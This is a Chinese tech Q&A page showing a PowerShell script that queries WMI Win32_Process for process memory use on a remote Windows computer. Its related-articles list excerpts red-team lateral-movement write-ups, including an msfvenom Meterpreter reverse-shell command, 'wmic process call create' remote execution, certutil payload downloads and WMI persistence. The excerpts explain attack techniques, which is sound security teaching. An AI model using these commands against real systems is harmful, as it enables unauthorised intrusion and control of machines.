首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

获取使用WMI在远程计算机上运行的进程的当前内存利用率

获取使用WMI在远程计算机上运行的进程的当前内存利用率是一个关于Windows系统中的Windows Management Instrumentation (WMI)的问题。WMI是一个用于管理和监视Windows系统的工具,它可以让你远程访问和管理系统的各种组件和服务。

在Windows系统中,可以使用WMI来获取远程计算机上运行的进程的内存利用率。这可以通过查询WMI的Win32_Process类来实现。以下是一个使用PowerShell脚本获取远程计算机上运行的进程的内存利用率的示例:

代码语言:powershell
复制
$computerName = "RemoteComputerName"
$username = "RemoteComputerUsername"
$password = "RemoteComputerPassword"

$credentials = New-Object System.Management.Automation.PSCredential($username, (ConvertTo-SecureString $password -AsPlainText -Force))

$wmi = Get-WmiObject -Class Win32_Process -ComputerName $computerName -Credential $credentials

foreach ($process in $wmi) {
    Write-Host "Process Name: $($process.Name) - Memory Usage: $($process.WorkingSetSize / 1MB) MB"
}

在这个示例中,我们使用Get-WmiObject命令来获取远程计算机上的Win32_Process类的实例。然后,我们遍历这些实例,并计算每个进程的内存利用率。最后,我们将进程名称和内存使用情况输出到控制台。

需要注意的是,使用WMI来获取远程计算机上的进程信息需要远程计算机的网络连接和适当的权限。此外,WMI可能会受到防火墙和安全策略的影响,因此在使用WMI时需要注意这些因素。

页面内容是否对你有帮助?
有帮助
没帮助

相关·内容

ATT&CK视角下红蓝对抗:二十三.横向移动之利用WMI进行横向渗透

用户利用WMI可以轻松地与系统各类资源进行交互,如打开指定进程远程启动计算机、设定指定程序指定时间运行、查询Windows日志等。我们可以把它当作API来与Windows系统进行相互交流。...渗透测试过程中,WMI价值就是不需要下载和安装,因为WMI是Windows系统自带功能,而且整个运行过程都在计算内存中进行,操作记录不会在Winodws日志中留存。...用户利用WMI可以轻松地与系统各类资源进行交互,如打开指定进程远程启动计算机、设定指定程序指定时间运行、查询Windows日志等。我们可以把它当作API来与Windows系统进行相互交流。...渗透测试过程中,WMI价值就是不需要下载和安装,因为WMI是Windows系统自带功能,而且整个运行过程都在计算内存中进行,操作记录不会在Winodws日志中留存。...WMIC远程获取Shell 攻击机上执行msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.2 LPORT=10090 -f exe

51610

远程计算获取WMI数据

---- 您可以使用本主题中过程和代码示例来创建完整WMI客户端应用程序,该应用程序执行COM初始化,连接到远程计算机上WMI,半同步获取数据,然后清理。...从远程计算获取WMI数据 通过调用CoInitializeEx初始化COM参数。 通过调用CoInitializeSecurity初始化COM进程安全性。...通过调用IWbemLocator :: ConnectServer获得远程计算机上\\ root \ cimv2命名空间指向IWbemServices指针。...另外,请确保尝试连接到远程计算计算机上用户名远程计算机上具有正确访问特权。 创建一个COAUTHIDENTITY结构,以提供用于设置代理安全性凭据。...这允许使用IEnumWbemClassObject接口半同步地检索来自查询数据对象。 设置IEnumWbemClassObject枚举器代理安全性。使用完凭据后,请确保从内存中删除它们。

2.1K10
  • 黑客(红队)攻防中内网环境下WMI利用

    通过这个模型,我们可以方便地从远程计算获取管理数据,也就是说,你可以自己电脑上查看和管理其他电脑信息。...地址和IP地址WMIC远程获取shell 而前面也说了WMIC还有远程管理文件和操作计算功能,所以我们可以利用这一点去远程操纵计算获取shell。 ...call create "cmd.exe"是要连接远程计算名称或IP地址,是要使用用户名,是对应密码.这段命令作用就是远程连接到...计算用户并且创建一个进程运行cmd.exe程序.而下一步就是将shell下载到目标计算机,这一步中我们需要在新进程中下载certutil.exe...&& start test.exe 则表示进程执行完毕后启动test.exe程序。利用WMI进行域横向  看完前面的操作相信师傅们也大致对WMI进行横向渗透也有了一定思路。

    18200

    红队技巧-常规横向手法

    ,通过它可以访问、配置、管理和监视几乎所有的Windows资源,比如用户可以远程计算机器上启动一个进程;设定一个WMI允许脚本语言(例如VBScript或Windows PowerShell)本地和远程管理...我们可以利用一个非常著名WMI类,Win32_Process,可通过利用来生成(远程进程执行命令。...)(组件对象模型)扩展,它允许应用程序实例化和访问远程计算机上COM对象属性和方法,就像使用基于DCERPCDCOM协议本地计算机上对象一样,有关每个COM(和DCOM)对象标识,实现和配置信息存储注册表中...powershell中我们可以使用 get-CimInstance来列出本地COM程序列表 远程DCOM对象实例表现如下: 客户端计算机从远程计算机请求实例化由CLSID表示对象。...6.Outlook Outlook对象允许实例化和任意COM相互作用通过“创建对象”对象方法。这使攻击者可以与远程计算机上COM对象进行交互,这些对象通常不会由DCOM公开。

    2.1K20

    内网环境下横向移动总结

    简单来讲,横向移动是指攻击者成功攻击一台计算机后,由该计算机横向跨越到另一台计算机,获取相关权限,进而窃取敏感信息活动。...相比于Psexec,使用WMI执行远程命令基本不会在远程机上留下日志,让黑客行为显得更隐蔽。...利用这个接口,客户端程序对象能够向网络中另一台计算机上服务器程序对象发送请求。DCOM是COM(组件对象模型)扩展,它允许应用程序实例化和访问远程计算机上COM对象属性和方法。...DCOM 使用远程过程调用(RPC)技术将组件对象模型(COM)功能扩展到本地计算机之外,因此,远程系统上托管COM服务器端软件(通常在DLL或exe中)可以通过RPC向客户端公开其方法。...使用DCOM进行横向移动优势之一在于,远程机上执行进程将会是托管COM服务器端软件。

    3.2K20

    WMI技术介绍和应用——WMI概述

    同时WMI技术一个非常大优势就是可以访问远程计算机,对于远程计算访问,我将安排在最末节去介绍。        ...它是Windows操作系统中管理数据和操作基础模块。我们可以通过WMI脚本或者应用程序去管理本地或者远程计算机上资源。对于VC和汇编程序员,想获取诸如CPU序列号和硬盘序列号等信息是非常容易。...它提供了一个通过操作系统、网络和企业环境去管理本地或远程计算统一接口集。应用程序和脚本语言使用这套接口集去完成任务,而不是直接通过Windows API。...这些WMI使用者,可以查询、枚举数据,也可以运行Provider方法,还可以向WMI订阅消息。当然这些数据操作都是要有相应Provider来提供。...如果请求是一个静态数据,WMI将从WMI存储库中查找数据并返回;如果请求是一个动态数据,比如一个托管对象的当前内存情况,WMI服务将请求传递给已经WMI服务中注册相应WMI提供者。

    2.4K20

    域内横向移动分析及防御

    192.168.1.10\c$ (2)tasklist 使用net use命令与远程目标机器建立ipc$后,可以使用tasklist命令列出远程机上运行进程 tasklist /S 192.168.1.10...,可以远程计算机上执行命令,也可以将管理员权限提升到System权限以运行指定程序 可以Windows server 2016 及以前使用 下载地址:https://download.sysinternals.com.../files/PSTools.zip PsExec基本原理是:通过管道远程目标计算机上创建一个psexec服务,并在本地磁盘中生成一个名为“PSEXECSVC”二进制文件,然后通过psexec服务运行命令...八、DCOM远程系统中使用 DCOM(Distributed Component Object Model,分布式组件对象模型)是微软一系列概念和程序接口 基于组件对象模型(COM),COM提供了一套允许同一台计算机上客户端和服务端之间进行通信接口...(Win95及之后) 客户端程序对象能够对网络中另一台计算机上服务器程序对象发送请求 执行流程同样: 通过ipc$连接远程计算机 执行命令 1、通过本地DCOM执行命令 获取DCOM程序列表: //

    1.5K11

    内网渗透步骤_内网渗透思路

    其中共享内存主要用于同一计算机内进程间通信,消息队列和管道主要用于分布式环境(通信进程位于通过网络连接不同计算机)。...简单来说,咱们cmd或者powershell中使用命令行语言,就是WMI支持,它提供给我们一个接口如powershell,便于我们管理计算机。...135端口主要用于使用RPC(Remote Procedure Call,远程过程调用)协议并提供DCOM(分布式组件对象模型)服务,通过RPC可以保证一台计算机上运行程序可以顺利地执行远程计算机上代码...进程间通信(IPC)是多任务操作系统或联网计算机之间运行程序和进程所用通信技术。有两种类型进程间通信(IPC)。...RPC开始是出现在Sun微系统公司和HP公司运行UNⅨ操作系统计算机中。 简单来说,RPC就是用于支持远程IPC连接。无论是本地连接还是远程连接,都要依托于VMI服务进行管理。

    4.8K30

    内网渗透测试:内网横向移动基础总结

    通过它你可以提升进程权限注入进程读取进程内存,当然他最大亮点就是他可以直接从 lsass.exe 进程获取当前登录系统用户名密码。 Mimikatz读取明文密码和hash也时最常用方法。...\douser\Desktop\whoami.txt \\192.168.183.130\c$ 使用net use命令与远程主机建立ipc$连接后,还可以使用tasklist命令/S、/U、/P参数列出目标远程机上运行进程...此部分更多详情请看我文章:《内网横向移动:利用WMI来渗透》 利用DCOM远程机器中执行命令 DCOM(分布式组件对象模型)是微软基于组件对象模型(COM)一些列概念和程序接口,COM提供了一套允许同一台计算机上客户端和服务器之间通信接口...通过DCOM,客户端程序对象能够向网络中另一台计算机上服务器程序对象发送请求。 下面通过一个实验来讲解如何使用DCOM远程机上面执行命令。...,攻击者smbrelayx.py脚本上就会发现命令成功执行了: 实战中,我们会提前生成了一个 Metasploit payload 并放置在当前目录下,然后用-e选项目标主机上传并运行我们payload

    3.2K10

    域渗透-横向移动命令总结

    SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f #关闭“仅允许运行使用网络级别身份验证远程桌面的计算机连接...利用 横向移动时,测试人员可以利用WMI提供管理功能,通过已获取用户凭据,与本地或远程主机进行交互,并控制其执行各种行为。...目前有两种常见利用方法: 一是通过调用WMI类方法进行远程执行,如Win32 Process类中Create方法可以远程机上创建进程,Win32 Product类中Install方法可以远程机上安装恶意...MSI; 二是远程部署WMI事件订阅,特定条事件发生时触发攻击。...,指定远程主机地址;/user,指定远程主机用户名;/password,指定用户密码 #通过调用Win32 Process.Create方法远程机上创建进程,启动CMD来执行系统命令,由于WMI

    2.3K10

    内网渗透 | 横向移动总结

    使用如下命令: •-accepteula:第一次运行psexec会弹出确认框,使用该参数就不会弹出确认框•-u:用户名•-p:密码•-s:以system权限运行运程进程,获得一个system权限交互式...利用这个接口,客户端程序对象能够向网络中另一台计算机上服务器程序对象发送请求。DCOM是COM(组件对象模型)扩展,它允许应用程序实例化和访问远程计算机上COM对象属性和方法。...DCOM 使用远程过程调用(RPC)技术将组件对象模型(COM)功能扩展到本地计算机之外,因此,远程系统上托管COM服务器端软件(通常在DLL或exe中)可以通过RPC向客户端公开其方法。...使用DCOM进行横向移动优势之一在于,远程机上执行进程将会是托管COM服务器端软件。...方法远程机上启动进程$com.DDEInitiate("cmd.exe","/c C:\shell.exe") 这里就不再列举其他方法了,这一部分因为知识储备问题很多都是借鉴大佬们思想,这里WHOAMI

    3.8K20

    PS常用命令之系统WMI查看和操作相关命令

    人人都知道WMI能干很多事情,读取本机硬盘信息、读取远程计算用户信息、读取域用户信息等等。基本上你能想到获取或者更改资源操作它都能干。可谓吃得少干得多。它为什么这么能干呢?...当然也可以把一个大型系统建立WMI以及WMI提供程序之上 Q: WMI 可以做什么? 答: 通过使你驱动程序成为 WMI 提供程序,你可以: 使自定义数据可用于 WMI 使用者。...Core(TM) i5-4590 CPU @ 3.30GHz # SocketDesignation : SOCKET 0 Get-WmiObject -Class Win32_Process # 获取本地计算机上进程...、操作 Get-WmiObject -Class Win32_Service -ComputerName 10.1.4.62 # 获取远程计算机上服务 Get-WmiObject Win32_Service...-Filter "name='WinRM'" -ComputerName Server01).StopService() # 停止远程计算机上WinRM服务,对该对象调用Win32_Service

    1.4K10

    WMI使用技巧集

    远程重启远程计算机?...除了 .NET 框架,还需要在计算机上安装 WMI 才能使用该命名空间中管理功能。...例如,WMI 广泛利用 .NET 集合类并使用推荐编码模式,如 .NET 异步操作“委托”模式。因此,使用 .NET 框架开发人员可以使用他们的当前技能访问有关计算机或应用程序管理信息。...请参见 使用 WMI 管理应用程序 | 检索管理对象集合 | 查询管理信息 | 预订和使用管理事件 | 执行管理对象方法 | 远程处理和连接选项 | 使用强类型对象 获取CPU序列号代码 string...WMI最早出现在Microsoft Windows 2000系统上,但它同样可以安装在Windows NT 4和Windows 9x计算机上WMI是一种轻松获取系统信息强大工具。

    81320

    WMI利用(横向移动)

    2021 WMI利用 (横向移动) 谢公子学安全 讲在前面 作者:pingpig@深蓝攻防实验室 上一篇文章我们简单解释了什么是WMIWMI做什么,为什么使用WMI。...本文是笔者阅读国内部分解释WMI横向移动文章后写下一篇文章,希望帮助同学们攻防中进入横向移动后根据实际场景利用WMI来解决问题。...横向移动中固定过程中一定离不开“信息收集”,然后分析信息根据实际场景(工作组或者域)来进行横向移动,至于使用什么工具,为什么使用这个工具,笔者使用WMI意见。...以及监听器 客户机上执行wmic命令,让指定机上线CS · payload generator 注意:测试下载时,可以自行使用Python开启WEB共享服务。...wmic命令,让指定机器上线CS · XSL 如下为普通xsl恶意文件,我们可以在下例中修改Run()中Payload,本地运行恶意程序或者远程使用Powershell亦或者其他下载命令等等,我们可以自行搭配

    2.8K10

    内网渗透基石篇--域内横向移动分析及防御

    查看远程主机C盘文件 2.tasklist命令 查看远程机上运行进程 tasklist /S 192.168.160.135 /U HACKBIJI\Administrator /P W2ngluoanquan...3 计划任务 1.at命令 at是windows自带用于创建计划任务命令,使用at命令可以远程目标上创建计划任务,建立定时任务四部曲如下: 使用net time 命令确定远程机器当前系统时间 使用...域环境中,用户登录计算机时使用大都是域账号,大量计算安装使用相同本地管理员账户和密码,因此,如果计算本地管理员账号和密码也是相同,攻击者就能使用哈希传递攻击方法登录内网中其他计算机。...3 更新KB2871997补丁产生影响 微软 2014年5月发布了KB2871997.该补丁禁止通过本地管理员权限与远程计算机进行连接,其后果是,无法通过本地管理员权限对远程计算使用psExee,...随后WMI会建立一个共享文件夹,用于远程读取命令执行结果。 当用户输入命令时,WMI创建进程执行该命令,然后把结果输出到文件,这个文件位于之前创建共享文件夹中。

    2.8K62

    服务器性能监视器_性能计数器感叹号

    文章来源:http://blog.csdn.net/lhfzd2004/article/details/1722379 上一篇文章《服务器性能监控之WMI》介绍了通过远程com获取服务器性能(当然也可用于本地...打开管理工具–>性能,我们可以立即看到服务器CPU,进程运行时间,磁盘容量等性能参数走势图。...获取CPU利用率 #region 获取CPU利用率 public static string getCpuUsage() …{ string used =...pc.NextValue().ToString(); return used; } #endregion 获取内存使用率 #region 获取内存使用率...,不过通过使用同样方式,我们可以获取更多性能以及进程运行情况,但是要说明一点是,所获取数据必定是windows服务所提供,当然我们也可以自己写一些windows服务,添加到系统performancecounter

    69920

    wmic命令解析与实例

    WMI, 它是由一系列工具集组成可以本地或者远程管理计算机系统。...WMI 特点: WMI有一组API: 我们不管使用VBScript、PowerShell脚本还是利用C#来访问WMI类库,都是因为WMI向外暴露一组API,通过调用API实现使用指定类。...WMI有一个存储库: 尽管WMI多数实例数据都不存储WMI中,但是WMI确实有一个存储库,用来存放提供程序提供类信息,或者称为类蓝图或者Schema。...描述: 但是WMIC出现之前如果要管理WMI系统必须使用一些专门WMI应用,例如SMS或者使用WMI脚本编程API,或者使用CIM Studio之类工具。...process call create notepad.exe #远程机器上创建新进程(值得利用) 会返回进程ID # 3.利用 wmic 实现远程下载后门 wmic /node:192.168.1.10

    2.4K20

    渗透测试神器CobaltStrike使用教程

    目标上内存中执行本地.NET程序    exit                      退出beacon    getprivs                  对当前令牌启用系统权限...任务设置父PID    ps                        显示进程列表    psexec                    使用服务机上生成会话    psexec_psh...               使用PowerShell机上生成会话    psinject                  特定进程中执行PowerShell命令    pth                      ...使用密钥连接远程主机    steal_token               从进程中窃取令牌    timestomp                 将一个文件时间戳应用到另一个文件    ...使用mimikatz转储明文凭据    winrm                     使用WinRM机上生成会话    wmi                       使用WMI机上生成会话

    3.7K20

    技术分享-持久性-WMI事件订阅

    应该注意是,WMI 事件作为 SYSTEM 运行重新启动后持续存在,并且需要管理员级别的权限才能使用此技术。 OF 托管对象格式 (MOF) 是用于描述 CIM(通用信息模型)类语言。.../Metasploit.mof 在这种情况下,payload 是通过 Metasploit “ web_delivery/ ”模块使用 regsvr32 方法远程获取。...Rahmat Nurfauzi开发了一个 PowerShell 脚本 ( WMI-Persistence ),它默认使用regsvr32方法执行任意命令,以便从远程服务器运行任意脚本。 ....有一个 PowerShell 模块可以通过特定时间执行基于 64 编码有效负载,目标主机上部署 WMI 事件订阅持久性技术。...“ wmi_updater ” 模块能够从远程位置获取有效负载,而不是将其存储 WMI 存储库中。它将注册为“ AutoUpdater ”,并且可以启动时或一天中特定时间设置触发器。

    2.7K10

    初识(fileless malware)无文件非恶意软件

    WMI 简介 1) 、WMI 是一项核心 Windows 管理技术;用户可以使用 WMI 管理本地和远程计算机。...2) 、WMI 提供有关本地或远程计算机状态信息,并且可以用于配置安全设置,例如系统属性,用户组,调度进程或禁用错误日志记录 3) 、WMI 一个重要功能是能够使用 DCOM 或 WinRM 协议与远程计算...这使攻击者可以远程计算机上远程操作 WMI 类,而无需事先在其上运行任何代码 0x02.2.2、使用 WMI 作为无文件非恶意软件优点 除了满足上面三点无文件非恶意软件流行原因,使用 WMI 作为无文件非恶意软件还有如下优点...0x02.2.3、WMI 被用于无文件非恶意软件攻击几个实例 1)、使用 Win32_Process 本地或远程生成进程,等效于运行 psexec wmi 2)、Wmi 事件权限维持 3)、著名无文件攻击病毒...NET 框架编写程序软件环境“通用语言运行时”中执行 3) 、.NET 与几种编程语言一起使用,包括 C#,VB.NET Shop,C ++和 F#。

    1.2K10
    领券